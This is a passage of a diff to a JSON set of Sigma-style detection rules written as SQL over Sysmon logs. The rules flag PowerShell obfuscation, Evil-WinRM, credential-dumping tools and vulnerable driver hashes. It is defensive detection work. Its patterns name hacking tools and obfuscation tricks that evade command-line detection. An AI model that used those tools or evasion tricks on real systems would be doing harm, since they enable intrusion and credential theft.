'%IMPHASH=6b2c6f95233c2914d1d488ee27531acc%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=d8a719865c448b1bd2ec241e46ac1c88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a74929edfc3289895e3f2885278947ae%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a66b476c2d06c370f0a53b5537f2f11e%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c28cd6ccd83179e79dac132a553693d9%' ESCAPE '\\') OR Imphash IN ('0604bb7cb4bb851e2168d5c7d9399087', '2e5f0e649d97f32b03c09e4686d0574f', '52f8aa269f69f0edad9e8fcdaedce276', 'c0e5d314da39dbf65a2dbff409cc2c76', '58623490691babe8330adc81cd04a663', '8ee39b48656e4d6b8459d7ba7da7438b', '45ee545ae77e8d43fc70ede9efcd4c96', 'a1b2e245acd47e4a348e1a552a02859a', '2a5f85fe4609461c6339637594fa9b0a', '6b2c6f95233c2914d1d488ee27531acc', '9f2fdd3f9ab922bbb0560a7df46f4342', 'd8a719865c448b1bd2ec241e46ac1c88', '0ea54f8c9af4a2fe8367fa457f48ed38', '9d519ae0a0864d6d6ae3f8b6c9c70af6', 'a74929edfc3289895e3f2885278947ae', 'a66b476c2d06c370f0a53b5537f2f11e', 'bdcd836a46bc2415773f6b5ea77a46e4', 'c28cd6ccd83179e79dac132a553693d9')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%join%split%' ESCAPE '\\' OR CommandLine LIKE '%( $ShellId[1]+$ShellId[13]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $PSHome[%]+$PSHOME[%]+%' ESCAPE '\\' OR CommandLine LIKE '%( $env:Public[13]+$env:Public[5]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $env:ComSpec[4,%,25]-Join'''')%' ESCAPE '\\' OR CommandLine LIKE '%[1,3]+''x''-Join'''')%' ESCAPE '\\'))" ], - "filename": "driver_load_win_windivert.yml" + "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" }, { - "title": "Vulnerable AVAST Anti Rootkit Driver Load", - "id": "7c676970-af4f-43c8-80af-ec9b49952852", + "title": "Use NTFS Short Name in Command Line", + "id": "dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", "status": "experimental", - "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Unknown" + "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1%' ESCAPE '\\') OR md5 = 'a179c4093d05a3e1ee73f6ff07f994aa' OR sha1 = '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' OR sha256 = '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1') OR (ImageLoaded LIKE '%\\\\aswArPot.sys' ESCAPE '\\' AND (Signed = 'false' OR SignatureStatus = 'Expired'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%~1.exe%' ESCAPE '\\' OR CommandLine LIKE '%~1.bat%' ESCAPE '\\' OR CommandLine LIKE '%~1.msi%' ESCAPE '\\' OR CommandLine LIKE '%~1.vbe%' ESCAPE '\\' OR CommandLine LIKE '%~1.vbs%' ESCAPE '\\' OR CommandLine LIKE '%~1.dll%' ESCAPE '\\' OR CommandLine LIKE '%~1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%~1.js%' ESCAPE '\\' OR CommandLine LIKE '%~1.hta%' ESCAPE '\\' OR CommandLine LIKE '%~2.exe%' ESCAPE '\\' OR CommandLine LIKE '%~2.bat%' ESCAPE '\\' OR CommandLine LIKE '%~2.msi%' ESCAPE '\\' OR CommandLine LIKE '%~2.vbe%' ESCAPE '\\' OR CommandLine LIKE '%~2.vbs%' ESCAPE '\\' OR CommandLine LIKE '%~2.dll%' ESCAPE '\\' OR CommandLine LIKE '%~2.ps1%' ESCAPE '\\' OR CommandLine LIKE '%~2.js%' ESCAPE '\\' OR CommandLine LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\xampp\\\\vcredist\\\\VCREDI~1.EXE%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_use_cli.yml" }, { - "title": "Vulnerable Dell BIOS Update Driver Load", - "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", - "status": "experimental", - "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - WinRM Access Via Evil-WinRM", + "id": "a197e378-d31b-41c0-9635-cfdf1c1bb423", + "status": "test", + "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543", - "attack.t1068" + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Legitimate BIOS driver updates (should be rare)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\DBUtil\\_2\\_3.Sys%' ESCAPE '\\' OR (Hashes LIKE '%SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25%' ESCAPE '\\' OR Hashes LIKE '%MD5=C996D7971C49252C582171D9380360F2%' ESCAPE '\\' OR Hashes LIKE '%MD5=D2FD132AB7BBC6BBB87A84F026FA0244%' ESCAPE '\\') OR sha256 IN ('0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1') OR sha1 IN ('c948ae14761095e4d76b55d9de86412258be7afd', '10b30bdee43b3a2ec4aa63375577ade650269d25') OR md5 IN ('c996d7971c49252c582171d9380360f2', 'd2fd132ab7bbc6bbb87a84f026fa0244')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ruby.exe' ESCAPE '\\' AND CommandLine LIKE '%-i %' ESCAPE '\\' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\')" ], - "filename": "driver_load_win_vuln_dell_driver.yml" + "filename": "proc_creation_win_hktl_evil_winrm.yml" }, { - "title": "Credential Dumping Tools Service Execution", - "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", - "status": "test", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Suspicious Reg Add BitLocker", + "id": "0e0255bf-2548-47b8-9582-c0955c9283f5", + "status": "experimental", + "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%fgexec%' ESCAPE '\\' OR ImageLoaded LIKE '%dumpsvc%' ESCAPE '\\' OR ImageLoaded LIKE '%cachedump%' ESCAPE '\\' OR ImageLoaded LIKE '%mimidrv%' ESCAPE '\\' OR ImageLoaded LIKE '%gsecdump%' ESCAPE '\\' OR ImageLoaded LIKE '%servpw%' ESCAPE '\\' OR ImageLoaded LIKE '%pwdump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%REG%' ESCAPE '\\' AND CommandLine LIKE '%ADD%' ESCAPE '\\' AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\' AND (CommandLine LIKE '%EnableBDEWithNoTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseAdvancedStartup%' ESCAPE '\\' OR CommandLine LIKE '%UseTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKey%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKeyPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessageSource%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessage%' ESCAPE '\\'))" ], - "filename": "driver_load_win_mal_creddumper.yml" + "filename": "proc_creation_win_reg_bitlocker.yml" }, { - "title": "Vulnerable Driver Load", - "id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", + "title": "Add Potential Suspicious New Download Source To Winget", + "id": "c15a46a0-07d4-4c87-b4b6-89207835a83b", "status": "experimental", - "description": "Detects the load of known vulnerable drivers by hash value", + "description": "Detects usage of winget to add new potentially suspicious download sources", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1068" + "attack.defense_evasion", + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA1=2261198385d62d2117f50f631652eded0ecc71db%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8db869c0674221a2d3280143cbb0807fac08e0cc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=27d3ebea7655a72e6e8b95053753a25db944ec0f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=33cdab3bbc8b3adce4067a1b042778607dce2acd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=21e6c104fe9731c874fab5c9560c929b2857b918%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d979353d04bf65cc92ad3412605bc81edbb75ec2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2f991435a6f58e25c103a657d24ed892b99690b8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f02af84393e9627ba808d4159841854a6601cf80%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bb962c9a8dda93e94fef504c4159de881e4706fe%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b97a8d506be2e7eaa4385f70c009b22adbd071ba%' ESCAPE '\\' OR Hashes LIKE '%SHA1=92f251358b3fe86fd5e7aa9b17330afa0d64a705%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8b6aa5b2bff44766ef7afbe095966a71bc4183fa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=af6e1f2cfb230907476e8b2d676129b6d6657124%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fcde5275ee1913509927ce5f0f85e6681064c9d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=00a442a4305c62cefa8105c0b4c4a9a5f4d1e93b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6523b3fd87de39eb5db1332e4523ce99556077dc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=72966ca845759d239d09da0de7eebe3abe86fee3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=57511ef5ff8162a9d793071b5bf7ebe8371759de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2d503a2457a787014a1fdd48a2ece2e6cbe98ea7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=400f833dcc2ef0a122dd0e0b1ec4ec929340d90e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=89cd760e8cb19d29ee08c430fb17a5fd4455c741%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1d0df45ee3fa758f0470e055915004e6eae54c95%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d5fd9fe10405c4f90235e583526164cd0902ed86%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c52cef5b9e1d4a78431b7af56a6fdb6aa1bcad65%' ESCAPE '\\' OR Hashes LIKE '%SHA1=609fa1efcf61e26d64a5ceb13b044175ab2b3a13%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7d7c03e22049a725ace2a9812c72b53a66c2548b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f9519d033d75e1ab6b82b2e156eafe9607edbcfb%' ESCAPE '\\' OR Hashes LIKE '%SHA1=468e2e5505a3d924b14fedee4ddf240d09393776%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2e3de9bff43d7712707ef8a0b10f7e4ad8427fd8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c9cbfdd0be7b35751a017ec59ff7237ffdc4df1f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=078ae07dec258db4376d5a2a05b9b508d68c0123%' ESCAPE '\\' OR Hashes LIKE '%SHA1=623cd2abef6c92255f79cbbd3309cb59176771da%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1f3a9265963b660392c4053329eb9436deeed339%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4a235f0b84ff615e2879fa9e0ec0d745fcfdaa5c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ace6b9e34e3e2e73fe584f3bbdb4e4ec106e0a7d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4268f30b79ce125a81d0d588bef0d4e2ad409bbb%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c834c4931b074665d56ccab437dfcc326649d612%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8f5cd4a56e6e15935491aa40adb1ecad61eafe7c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=51b60eaa228458dee605430aae1bc26f3fc62325%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3270720a066492b046d7180ca6e60602c764cac7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2a6e6bd51c7062ad24c02a4d2c1b5e948908d131%' ESCAPE '\\' OR Hashes LIKE '%SHA1=19bd488fe54b011f387e8c5d202a70019a204adf%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a6fe4f30ca7cb94d74bc6d42cdd09a136056952e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ea877092d57373cb466b44e7dbcad4ce9a547344%' ESCAPE '\\' OR Hashes LIKE '%SHA1=205c69f078a563f54f4c0da2d02a25e284370251%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f9feb60b23ca69072ce42264cd821fe588a186a6%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b25170e09c9fb7c0599bfba3cf617187f6a733ac%' ESCAPE '\\' OR Hashes LIKE '%SHA1=160c96b5e5db8c96b821895582b501e3c2d5d6e7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a2e0b3162cfa336cd4ab40a2acc95abe7dc53843%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4e826430a1389032f3fe06e2cc292f643fb0c417%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7ab4565ba24268f0adadb03a5506d4eb1dc7c181%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dc7b022f8bd149efbcb2204a48dce75c72633526%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0307d76750dd98d707c699aee3b626643afb6936%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5711c88e9e64e45b8fc4b90ab6f2dd6437dc5a8a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6714380bc0b8ab09b9a0d2fa66d1b025b646b946%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8626ab1da6bfbdf61bd327eb944b39fd9df33d1d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=30a224b22592d952fbe2e6ad97eda4a8f2c734e0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c95db1e82619fb16f8eec9a8209b7b0e853a4ebe%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fe1d909ab38de1389a2a48352fd1c8415fd2eab0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b4d1554ec19504215d27de0758e13c35ddd6db3e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5dd2c31c4357a8b76db095364952b3d0e3935e1d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ecb4d096a9c58643b02f328d2c7742a38e017cf0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4a705af959af61bad48ef7579f839cb5ebd654d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d2e6fc9259420f0c9b6b1769be3b1f63eb36dc57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c948ae14761095e4d76b55d9de86412258be7afd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ddbe809b731a0962e404a045ab9e65a0b64917ad%' ESCAPE '\\' OR Hashes LIKE '%SHA1=745bad097052134548fe159f158c04be5616afc2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8d59fd14a445c8f3f0f7991fa6cd717d466b3754%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2dfcb799b3c42ecb0472e27c19b24ac7532775ce%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc51be79ae56bc97211f6b73cc905c3492da8f9d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ac13941f436139b909d105ad55637e1308f49d9a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2b0bb408ff0e66bcdf6574f1ca52cbf4015b257b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc0e0440adc058615e31e8a52372abadf658e6b1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5520ac25d81550a255dc16a0bb89d4b275f6f809%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6afc6b04cf73dd461e4a4956365f25c1f1162387%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4b009e91bae8d27b160dc195f10c095f8a2441e1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6003184788cd3d2fc624ca801df291ccc4e225ee%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0466e90bf0e83b776ca8716e01d35a8a2e5f96d3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e6305dddd06490d7f87e3b06d09e9d4c1c643af0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=89909fa481ff67d7449ee90d24c167b17b0612f1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d7e8aef8c8feb87ce722c0b9abf34a7e6bab6eb4%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5e6ddd2b39a3de0016385cbd7aa50e49451e376d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=976777d39d73034df6b113dfce1aa6e1d00ffcfd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c6749fc6c1127f8788bff70e0ce9062959637c9%' ESCAPE '\\' OR Hashes LIKE '%SHA1=53acd4d9e7ba0b1056cf52af0d191f226eddf312%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3abb9d0a9d600200ae19c706e570465ef0a15643%' ESCAPE '\\' OR Hashes LIKE '%SHA1=27eab595ec403580236e04101172247c4f5d5426%' ESCAPE '\\' OR Hashes LIKE '%SHA1=78b9481607ca6f3a80b4515c432ddfe6550b18a8%' ESCAPE '\\' OR Hashes LIKE '%SHA1=414cd15d6c991d19fb5be02e3b9fb0e6c5ce731c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d9c09dd725bc7bc3c19b4db37866015817a516ef%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c256edd10823ca76c0443a330e523027b70522d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=35829e096a15e559fcbabf3441d99e580ca3b26e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b8de3a1aeeda9deea43e3f768071125851c85bd0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=054a50293c7b4eea064c91ef59cf120d8100f237%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d94f2fb3198e14bfe69b44fb9f00f2551f7248b2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=01a578a3a39697c4de8e3dab04dba55a4c35163e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=14bf0eaa90e012169745b3e30c281a327751e316%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f50c6b84dfb8f2d53ba3bce000a55f0a486c0e79%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6100eb82a25d64a7a7702e94c2b21333bc15bd08%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bf87e32a651bdfd9b9244a8cf24fca0e459eb614%' ESCAPE '\\' OR Hashes LIKE '%SHA1=28b1c0b91eb6afd2d26b239c9f93beb053867a1a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=879fcc6795cebe67718388228e715c470de87dca%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1f7501e01d84a2297c85cb39880ec4e40ac3fe8a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=152b6bb9ffd2ffec00cc46f5c6e29362d0e66e67%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5f8356ffa8201f338dd2ea979eb47881a6db9f03%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a7bd05de737f8ea57857f1e0845a25677df01872%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cce9b82f01ec68f450f5fe4312f40d929c6a506e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e35a2b009d54e1a0b231d8a276251f64231b66a3%' ESCAPE '\\' OR Hashes LIKE '%SHA1=37364cb5f5cefd68e5eca56f95c0ab4aff43afcc%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d62fa51e520022483bdc5847141658de689c0c29%' ESCAPE '\\' OR Hashes LIKE '%SHA1=93aa3bb934b74160446df3a47fa085fd7f3a6be9%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ec4cc6de4c779bb1ca1dd32ee3a03f7e8d633a9b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=35f1ba60ba0da8512a0b1b15ee8e30fe240d77cd%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3805e4e08ad342d224973ecdade8b00c40ed31be%' ESCAPE '\\' OR Hashes LIKE '%SHA1=65d8a7c2e867b22d1c14592b020c548dd0665646%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c8d87f3cd34c572870e63a696cf771580e6ea81b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c4d7fb9db3c3459f7e8c0e3d48c95c7c9c4cff60%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d34a7c497c603f3f7fcad546dc4097c2da17c430%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1fd7f881ea4a1dbb5c9aeb9e7ad659a85421745b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0b8b83f245d94107cb802a285e6529161d9a834d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c969f1f73922fd95db1992a5b552fbc488366a40%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ac600a2bc06b312d92e649b7b55e3e91e9d63451%' ESCAPE '\\' OR Hashes LIKE '%SHA1=da9cea92f996f938f699902482ac5313d5e8b28e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=33285b2e97a0aeb317166cce91f6733cf9c1ad53%' ESCAPE '\\' OR Hashes LIKE '%SHA1=21edff2937eb5cd6f6b0acb7ee5247681f624260%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f052dc35b74a1a6246842fbb35eb481577537826%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f0c463d29a5914b01e4607889094f1b7d95e7aaf%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0c26ab1299adcd9a385b541ef1653728270aa23e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f36a47edfacd85e0c6d4d22133dd386aee4eec15%' ESCAPE '\\' OR Hashes LIKE '%SHA1=460008b1ffd31792a6deadfa6280fb2a30c8a5d2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=738b7918d85e5cb4395df9e3f6fc94ddad90e939%' ESCAPE '\\' OR Hashes LIKE '%SHA1=43419df1f9a07430a18c5f3b3cc74de621be0f8e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=558aad879b6a47d94a968f39d0a4e3a3aaef1ef1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7fb52290883a6b69a96d480f2867643396727e83%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f5696fb352a3fbd14fb1a89ad21a71776027f9ab%' ESCAPE '\\' OR Hashes LIKE '%SHA1=693a2645c28fc3b248fda95179c36c3ac64f6fc2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=05c0c49e8bcf11b883d41441ce87a2ee7a3aba1d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d25340ae8e92a6d29f599fef426a2bc1b5217299%' ESCAPE '\\' OR Hashes LIKE '%SHA1=7c1b25518dee1e30b5a6eaa1ea8e4a3780c24d0c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=fe10018af723986db50701c8532df5ed98b17c39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bfe55cacc7c56c9f7bd75bdb4b352c0b745d071b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a21c84c6bf2e21d69fa06daaf19b4cc34b589347%' ESCAPE '\\' OR Hashes LIKE '%SHA1=82ba5513c33e056c3f54152c8555abf555f3e745%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d098600152e5ee6a8238d414d2a77a34da8afaaa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=64e4ac8b9ea2f050933b7ec76a55dd04e97773b4%' ESCAPE '\\' OR Hashes LIKE '%SHA1=bbc1e5fd826961d93b76abd161314cb3592c4436%' ESCAPE '\\' OR Hashes LIKE '%SHA1=90a76945fd2fa45fab2b7bcfdaf6563595f94891%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b03b1996a40bfea72e4584b82f6b845c503a9748%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c771ea59f075170e952c393cfd6fc784b265027c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cb44c6f0ee51cb4c5836499bc61dd6c1fbdf8aa1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=0918277fcdc64a9dc51c04324377b3468fa1269b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b09bcc042d60d2f4c0d08284818ed198cededa04%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8dc2097a90eb7e9d6ee31a7c7a95e7a0b2093b89%' ESCAPE '\\' OR Hashes LIKE '%SHA1=15df139494d2c40a645fb010908551185c27f3c5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=012db3a80faf1f7f727b538cbe5d94064e7159de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d04e5db5b6c848a29732bfd52029001f23c3da75%' ESCAPE '\\' OR Hashes LIKE '%SHA1=490109fa6739f114651f4199196c5121d1c6bdf2%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b4d014b5edd6e19ce0e8395a64faedf49688ecb5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a87d6eac2d70a3fbc04e59412326b28001c179de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3f223581409492172a1e875f130f3485b90fbe5f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5db61d00a001fd493591dc919f69b14713889fc5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9923c8f1e565a05b3c738d283cf5c0ed61a0b90f%' ESCAPE '\\' OR Hashes LIKE 